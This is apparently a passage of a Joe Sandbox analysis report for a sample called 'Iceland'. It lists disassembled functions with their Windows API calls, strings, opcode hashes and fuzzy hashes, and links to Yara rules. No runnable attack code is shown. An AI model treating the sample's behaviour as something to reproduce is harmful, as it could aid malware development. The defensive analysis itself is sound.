SysAllocString.OLEAUT32(00000000), ref: 009781D2
SysAllocString.OLEAUT32 ref: 009781F3
SysFreeString.OLEAUT32 ref: 009781FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00978216
SysAllocString.OLEAUT32(?), ref: 00978224

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b8cc9c3fea9b53fb0b71cbf452a4b77964d3cfd82f17d3acdd9bf86a6bfaaf48
Instruction ID: 7d30de766e94a58a5ee72c997d7e54aa797a85ccf28878f1abc4210eed5b6e50
Opcode Fuzzy Hash: b8cc9c3fea9b53fb0b71cbf452a4b77964d3cfd82f17d3acdd9bf86a6bfaaf48
Instruction Fuzzy Hash: 5A217172609204BF9B109BB8DC89DAB77ECEF4A360704C125F919CB2A1DA74EC41DB64

Function 00980E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00980E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00980ED5

Strings

nul, xrefs: 00980F0E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 2ebc44919ad33e446334ad872a69bbe89fa939d4b4c3489a33bcce11c2f55386
Instruction ID: a338f270bf37013b8c1ae10553757c93d27eed32b5e3d4b57158f710e32b006f
Opcode Fuzzy Hash: 2ebc44919ad33e446334ad872a69bbe89fa939d4b4c3489a33bcce11c2f55386
Instruction Fuzzy Hash: 79219F7150430AABDB70AF25DC04A9A7BA8FF95320F208A19FDA5E73D0D770D844DB50

Function 00980F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00980F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00980FA8

Strings

nul, xrefs: 00980FE0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 832a062120a73bfc2fe94b55218b455507d5295cede17c930acbd2a2843d983e
Instruction ID: 6be631eaec3e6d17583156d1b8cc8c10ccb0613d8b2a25eb22691c04ea5b397e
Opcode Fuzzy Hash: 832a062120a73bfc2fe94b55218b455507d5295cede17c930acbd2a2843d983e
Instruction Fuzzy Hash: 6D21B0316043059BDB30AF688C04A9AB7ECBF96724F204A19FDA1E33D0DB709885DB50

Function 009A4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00917873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009178B1
Part of subcall function 00917873: GetStockObject.GDI32(00000011), ref: 009178C5
Part of subcall function 00917873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009178CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009A4BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009A4BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009A4BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009A4BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009A4BE3

Strings

Msctls_Progress32, xrefs: 009A4B81

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 5d40d2ecd3b3f4eb8c1e11c767ed8ded514b2d9ed8afcc52c1eb3c726b3b5b11
Instruction ID: 85bfdde2fc9082f80662c17aad7ee4abac5bf0f5043aab30fcca05a95120650a
Opcode Fuzzy Hash: 5d40d2ecd3b3f4eb8c1e11c767ed8ded514b2d9ed8afcc52c1eb3c726b3b5b11
Instruction Fuzzy Hash: 6F1193B155021DBEEF119FA4CC85EEB7F6DEF49758F014111B618A6050CA71DC219BA0

Function 0094DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0094DB23: _free.LIBCMT ref: 0094DB4C

_free.LIBCMT ref: 0094DBAD

Part of subcall function 00942D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0094DB51,009E1DC4,00000000,009E1DC4,00000000,?,0094DB78,009E1DC4,00000007,009E1DC4,?,0094DF75,009E1DC4), ref: 00942D4E
Part of subcall function 00942D38: GetLastError.KERNEL32(009E1DC4,?,0094DB51,009E1DC4,00000000,009E1DC4,00000000,?,0094DB78,009E1DC4,00000007,009E1DC4,?,0094DF75,009E1DC4,009E1DC4), ref: 00942D60

_free.LIBCMT ref: 0094DBB8
_free.LIBCMT ref: 0094DBC3
_free.LIBCMT ref: 0094DC17
_free.LIBCMT ref: 0094DC22
_free.LIBCMT ref: 0094DC2D
_free.LIBCMT ref: 0094DC38

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: aa01b289fe7e77a338c7d810cfc169716a22fc2edc93afe209ff1eeb7bb90606
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 71116372942B04BAD930BBB0DC0BFCB77DCEF85700F810C29B2D9AA192DA75B5048751

Function 0097E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0097E328
LoadStringW.USER32(00000000), ref: 0097E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0097E345
LoadStringW.USER32(00000000), ref: 0097E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0097E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0097E36D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: b728ae8f4f58983ad77c9b49a673329f3c3a295e283bfb68b73b21d616744d6f
Instruction ID: 54d43d22bb22a1b0c0a481ef9d257d10399052124b982cdf6c64e6dfe44ed12c
Opcode Fuzzy Hash: b728ae8f4f58983ad77c9b49a673329f3c3a295e283bfb68b73b21d616744d6f
Instruction Fuzzy Hash: 150181F39042087FE711ABA48D89EEB776CDB0D300F408591B74AE6441EA749E849BB5

Function 00981312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00981322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00981334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00981342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00981350
CloseHandle.KERNEL32(00000000), ref: 0098135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 0098136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00981376

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 6309c5f5e67f75e73d18adddbd0cb50cb48de20eeb41b25fc098d3e0218a9d17
Instruction ID: 7fa953033d02fba7ba69aae19f35bbefc5e9ac75748eff8d9ef5322c4004ee8e
Opcode Fuzzy Hash: 6309c5f5e67f75e73d18adddbd0cb50cb48de20eeb41b25fc098d3e0218a9d17
Instruction Fuzzy Hash: 25F0EC3205B612BBD7452B54EE49BD6BB39FF46302F401121F10391CA08B749471EFD0

Function 0096E77A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 0096E785
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0096E797
FreeLibrary.KERNEL32(00000000), ref: 0096E7BD

Strings

X64, xrefs: 0096E680
GetSystemWow64DirectoryW, xrefs: 0096E791
kernel32.dll, xrefs: 0096E780

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64$kernel32.dll
API String ID: 145871493-2904798639
Opcode ID: 2b3147ac90962d0cd074acda6d90f4a519b9678e03f1047a08ccd9994dd0063d
Instruction ID: c296ae372b9e234749b4fcd908b74b5043d23c9c08e65601e316233f580e868e
Opcode Fuzzy Hash: 2b3147ac90962d0cd074acda6d90f4a519b9678e03f1047a08ccd9994dd0063d
Instruction Fuzzy Hash: D5E0687982B630DFD3756B24DC84E6A33387F22B04F010454F903E2020DB30CD008AD0

Function 009926BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0099281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0099283E
WSAGetLastError.WSOCK32 ref: 0099284F
htons.WSOCK32(?,?,?,?,?), ref: 00992938
inet_ntoa.WSOCK32(?), ref: 009928E9

Part of subcall function 0097433E: _strlen.LIBCMT ref: 00974348

Part of subcall function 00993C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0098F669), ref: 00993C9D

_strlen.LIBCMT ref: 00992992

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 5b67075edec43425af3a281fbad5396d767f1a6722eabe2aa11da05c89e3ff45
Instruction ID: 2d2b7dfa87f9c7cc21e2f46c4513d38adb181dff11b305da6ecbb0a1950078b1
Opcode Fuzzy Hash: 5b67075edec43425af3a281fbad5396d767f1a6722eabe2aa11da05c89e3ff45
Instruction Fuzzy Hash: 14B1E475604300AFD724DF68C885F6AB7E9AF88318F54854CF49A5B2E2DB31ED81CB91

Function 00940527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0094042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00940446
__allrem.LIBCMT ref: 0094045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0094047B
__allrem.LIBCMT ref: 00940492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009404B0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: af3ac9186f9a108dd078390f3a0e033582979a104886519a388e53058667eb96
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: A581E871A0070A9BE724AF69CC81F6E77E8AFC5724F24452AF611DB691F774D9008B90

Function 00946571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00938649,00938649,?,?,?,009467C2,00000001,00000001,8BE85006), ref: 009465CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009467C2,00000001,00000001,8BE85006,?,?,?), ref: 00946651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0094674B
__freea.LIBCMT ref: 00946758

Part of subcall function 00943B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00936A79,?,0000015D,?,?,?,?,009385B0,000000FF,00000000,?,?), ref: 00943BC5

__freea.LIBCMT ref: 00946761
__freea.LIBCMT ref: 00946786

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 275d7771e67dd999542ff2b71525016917969752924182df273c7b8511f8ea7e
Instruction ID: 8228ff0fa9abac84ae8b7fe564736c3a1ced1315bea90c8df8febe1b31f28284
Opcode Fuzzy Hash: 275d7771e67dd999542ff2b71525016917969752924182df273c7b8511f8ea7e
Instruction Fuzzy Hash: 8F51F0B2610206AFEB298F64CC81FBF7BAAEF82754F154669FC04D6140EB34DC50C6A1

Function 0099C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Part of subcall function 0099D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0099C10E,?,?), ref: 0099D415
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D451
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D4C8
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0099C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0099C785
RegCloseKey.ADVAPI32(00000000), ref: 0099C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0099C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0099C853
RegCloseKey.ADVAPI32(?), ref: 0099C85F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 794b71b4179e2668eaf30a91c894a5a1d27446ee47ac8fdebb288195dfd5b76e
Instruction ID: 5609cbf6f48ac0a3ed117c6f4fb6d69ce646a061025ad2321ae9f6a6e24da850
Opcode Fuzzy Hash: 794b71b4179e2668eaf30a91c894a5a1d27446ee47ac8fdebb288195dfd5b76e
Instruction Fuzzy Hash: 25819071208241AFCB14DF68C885F6ABBE9FF84308F14495CF4594B2A2DB31ED45CB92

Function 0097009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 009700A9
SysAllocString.OLEAUT32(00000000), ref: 00970150
VariantCopy.OLEAUT32(00970354,00000000), ref: 00970179
VariantClear.OLEAUT32(00970354), ref: 0097019D
VariantCopy.OLEAUT32(00970354,00000000), ref: 009701A1
VariantClear.OLEAUT32(?), ref: 009701AB

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 38ab2193dde50ce544530f0d9a2041f90142b50bd2b1d5259394c75415ba29e0
Instruction ID: 8b36df2792359860a95690a89cb2ba133799fc167f6301b551e1e1d3b575495c
Opcode Fuzzy Hash: 38ab2193dde50ce544530f0d9a2041f90142b50bd2b1d5259394c75415ba29e0
Instruction Fuzzy Hash: 1C51B537650310EACF10AB64D899B6DB3A9AFC6310F14D446F80EEF297DA749C40DB96

Function 00989B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 009141EA: _wcslen.LIBCMT ref: 009141EF

Part of subcall function 00918577: _wcslen.LIBCMT ref: 0091858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00989F2A
_wcslen.LIBCMT ref: 00989F4B
_wcslen.LIBCMT ref: 00989F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00989FCA

Strings

X, xrefs: 00989E57

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 13cb6aacf433c77aaede0d3a4a4c420a579d57b960380281e53d540fa159bf3d
Instruction ID: d81eb1e65c35b6207b627fca60e641826192c951b328dbfa1b558797191595e3
Opcode Fuzzy Hash: 13cb6aacf433c77aaede0d3a4a4c420a579d57b960380281e53d540fa159bf3d
Instruction Fuzzy Hash: 3FE190716083449FC724EF24C881BAAB7E5BF85314F04896DF8899B3A2DB31DD45CB92

Function 00986ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00986F21
CoInitialize.OLE32(00000000), ref: 0098707E
CoCreateInstance.OLE32(009B0CC4,00000000,00000001,009B0B34,?), ref: 00987095
CoUninitialize.OLE32 ref: 00987319

Strings

.lnk, xrefs: 00986EFF, 00986F69, 00987025

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: f1544c40ec395bbea27c7241bd306db62a7ba22eb997466d76f6325dbb4148e6
Instruction ID: b39ddd6291838d066dd98d63d19fe0f883e5b7fb47bf443d963b622fe768d005
Opcode Fuzzy Hash: f1544c40ec395bbea27c7241bd306db62a7ba22eb997466d76f6325dbb4148e6
Instruction Fuzzy Hash: D6D16771608205AFC304EF64C881AABB7E8FFD8744F50496DF5958B2A2DB31E945CB92

Function 00911B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0091249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009124B0

BeginPaint.USER32(?,?,?), ref: 00911B35
GetWindowRect.USER32(?,?), ref: 00911B99
ScreenToClient.USER32(?,?), ref: 00911BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00911BC7
EndPaint.USER32(?,?,?,?,?), ref: 00911C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00953287

Part of subcall function 00911C2D: BeginPath.GDI32(00000000), ref: 00911C4B

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 50277d9a9886c0c4df56599a9dba1bfaaeccc7cd556ac60b00f15695e029da23
Instruction ID: a9576ede21f4337e33cdc006286cbdf6809517bad04bff411ced836ed0ddd68a
Opcode Fuzzy Hash: 50277d9a9886c0c4df56599a9dba1bfaaeccc7cd556ac60b00f15695e029da23
